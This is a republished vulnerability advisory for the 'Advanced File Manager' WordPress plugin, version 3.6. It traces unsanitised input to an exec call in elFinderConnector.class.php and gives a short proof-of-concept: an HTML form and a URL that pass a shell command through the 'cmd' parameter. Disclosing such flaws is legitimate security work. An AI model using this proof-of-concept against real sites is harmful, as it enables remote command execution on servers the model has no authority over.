Advanced File Manager V3.6 - Remote Command Execution
2020-10-29 00:57:42 Author: cxsecurity.com(查看原文) 阅读量:116 收藏

Advanced File Manager V3.6 - Remote Command Execution

[-] Title : Advanced File Manager V3.6 - Remote Command Execution [-] Author : Milad Karimi [-] Vendor : https://wordpress.org/plugins/file-manager-advanced [-] Category : Webapps [-] Date : 2020-10-27 Vulnerable Page: /elFinderConnector.class.php Vulnerable Source: 160: exec elFinder->exec ($cmd, $args) 108: $cmd = $src['cmd'] : ''; 93: $src[$key][] = rawurldecode($value); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), if(preg_match('/^(.+?)\[([^\[\]]*)\]$/', $key, $m)), if($idx) else , 82: list($key, $value) = array_pad(explode('=', $part), 2, ''); // list() if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), 81: foreach($parts as $part) // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), 78: $parts = explode('&', $rawPostData); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), 76: $rawPostData = file_get_contents('php://input')){ // , trace stopped 80: $src = array(); // if((!$src || $maxInputVars) && $rawPostData = file_get_contents('php://input')), if(!$src || $maxInputVars < count($parts)), 74: $src = array_merge($_GET, $_POST) : $_GET; requires: 71: ⇓ function run() Exploit Code: <html> <form action="http://localhost/application/library/php/elFinderConnector.class.php" method="GET"> <input name="cmd" type="text"> <input type="submit" value="RCE!" > </form> </html> Exploit URL: http://localhost/application/library/php/elFinderConnector.class.php?cmd=ls



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2020, cxsecurity.com

Back to Top


文章来源: https://cxsecurity.com/issue/WLB-2020100174
如有侵权请联系:admin#unsafe.sh